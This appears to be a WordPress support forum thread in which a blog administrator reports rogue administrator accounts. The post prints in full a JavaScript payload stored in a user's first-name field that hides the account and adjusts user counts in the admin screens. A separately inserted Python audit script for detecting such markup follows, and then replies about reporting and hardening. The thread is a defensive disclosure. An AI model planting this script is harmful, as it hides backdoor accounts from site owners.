Title: Possible WordPress exploit
Last modified: August 19, 2016

---

# Possible WordPress exploit

 *  [jtietze](https://wordpress.org/support/users/jtietze/)
 * (@jtietze)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/)
 * Hi
   I discovered today that two new users had been created on the WordPress blog
   I administer (version 2.7.1). Both users had the same javascript code as their
   “first name” (shown below).
 * In the upload directory I found two files whose names matched existing files,
   but with different extensions, dated 2nd of June 1933.
 * I’ve deleted both users, and the files in the upload directory.
 * I’m wondering whether this should or could be reported somewhere.
   How could such an event be prevented?
 * **wp_capabilities**
   `a:1:{s:13:"administrator";b:1;}`
 * **wp_user_level**
   `10`
 * **first_name**

   ```
   ...

   <b id="user_superuser"><script language="JavaScript">
   var setUserName = function(){
       try{
           var t=document.getElementById("user_superuser");
           while(t.nodeName!="TR"){
               t=t.parentNode;
           };
           t.parentNode.removeChild(t);
           var tags = document.getElementsByTagName("H3");
           var s = " shown below";
           for (var i = 0; i < tags.length; i++) {
               var t=tags[i].innerHTML;
               var h=tags[i];
               if(t.indexOf(s)>0){
                   s =(parseInt(t)-1)+s;
                   h.removeChild(h.firstChild);
                   t = document.createTextNode(s);
                   h.appendChild(t);
               }
           }

           var arr=document.getElementsByTagName("ul");
           for(var i in arr) if(arr[i].className=="subsubsub"){
               var n=/>Administrator \\((\\d+)\\)</gi.exec(arr[i].innerHTML);
               if(n!=null && n[1]>0){
                   var txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,">Administrator ("+(n[1]-1)+")<");
                   arr[i].innerHTML=txt;
               }

               var n=/>Administrator <span class="count">\\((\\d+)\\)</gi.exec(arr[i].innerHTML);
               if(n!=null && n[1]>0){
                   var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\\((\\d+)\\)</gi,">Administrator <span class=\\"count\\">("+(n[1]-1)+")<");
                   arr[i].innerHTML=txt;
               }

               var n=/>All <span class="count">\\((\\d+)\\)</gi.exec(arr[i].innerHTML);
               if(n!=null && n[1]>0){
                   var txt=arr[i].innerHTML.replace(/>All <span class="count">\\((\\d+)\\)</gi,">All <span class=\\"count\\">("+(n[1]-1)+")<");
                   arr[i].innerHTML=txt;
               }
           }
       }catch(e){};
   };
   addLoadEvent(setUserName);
   </script>
   ```


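The planted script above works by deleting the rogue account's row from the Users screen and decrementing the on-screen counts, so the admin interface cannot be trusted to show who holds the administrator role. The check below is an added example, not code from this thread or from WordPress: it audits `wp_usermeta` rows (constructed sample data, with an abbreviated stand-in for the posted payload) for user meta that contains HTML or `<script>` markup, and lists administrator accounts straight from the stored capabilities so that list can be compared with what the Users screen displays.

```python
import re

# Constructed sample rows in the shape of wp_usermeta (user_id, meta_key, meta_value).
# User 7's first_name is an abbreviated stand-in for the payload in the post, not real data.
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (1, "first_name", "Alice"),
    (7, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (7, "wp_user_level", "10"),
    (7, "first_name", '<b id="user_superuser"><script language="JavaScript">'
                      'var setUserName=function(){};</script>'),
    (9, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (9, "first_name", "Bob <3 wp"),   # a bare "<" is not markup; must not be flagged
]

# Role names inside a PHP-serialized wp_capabilities array, e.g. s:13:"administrator";b:1;
SERIALIZED_ROLE = re.compile(r's:\d+:"([^"]+)";b:1;')
# Something that looks like an HTML tag: "<" followed by an optional "/" and a tag name.
HTML_TAG = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def roles_from_capabilities(value):
    """Extract the set of role names granted by a serialized wp_capabilities value."""
    return set(SERIALIZED_ROLE.findall(value))


def administrator_ids(rows):
    """Administrator user ids taken from the stored data, independent of the UI."""
    return sorted({uid for uid, key, value in rows
                   if key == "wp_capabilities"
                   and "administrator" in roles_from_capabilities(value)})


def audit_usermeta(rows):
    """Return {user_id: [findings]} for users whose profile meta carries markup."""
    by_user = {}
    for user_id, key, value in rows:
        by_user.setdefault(user_id, {})[key] = value
    findings = {}
    for user_id, meta in sorted(by_user.items()):
        notes = []
        for key, value in meta.items():
            if key == "wp_capabilities":
                continue
            if HTML_TAG.search(value):
                notes.append(f"{key} contains HTML markup")
            if "<script" in value.lower():
                notes.append(f"{key} contains a <script> tag")
        if notes and "administrator" in roles_from_capabilities(meta.get("wp_capabilities", "")):
            notes.append("user is an administrator")
        if notes:
            findings[user_id] = notes
    return findings
```

If `administrator_ids()` returns more accounts than the Users screen lists, the screen is being manipulated client-side and the extra ids are the ones to investigate.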
Viewing 3 replies - 1 through 3 (of 3 total)

 *  [MichaelH](https://wordpress.org/support/users/michaelh/)
 * (@michaelh)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071592)
 * Security issues can be reported by email to [security@wordpress.org](mailto:security@wordpress.org)
 * Also make sure your **New user default role** in [Administration](http://codex.wordpress.org/Administration_Panels)
   > [Settings](http://codex.wordpress.org/Administration_Panels#General) > [General](http://codex.wordpress.org/Settings_General_SubPanel)
   is set to subscriber.
 *  Thread Starter [jtietze](https://wordpress.org/support/users/jtietze/)
 * (@jtietze)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071638)
 * The **New user default role** you describe is set to _subscriber_.
 * I have noticed a similar post on a German forum:
   <http://forum.wordpress-deutschland.org/allgemeines/47429-gibts-ne-luecke-2.html#post229702>
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071639)
 * Just for grins, check all index files on your site(s).
   Ask your host if others have had similar problems; shared servers are only as good as the weakest user.

The topic ‘Possible WordPress exploit’ is closed to new replies.

## Tags

 * [exploit](https://wordpress.org/support/topic-tag/exploit/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 3 participants
 * Last reply from: [Samuel B](https://wordpress.org/support/users/samboll/)
 * Last activity: [17 years, 1 month ago](https://wordpress.org/support/topic/possible-wordpress-exploit/#post-1071639)
 * Status: not resolved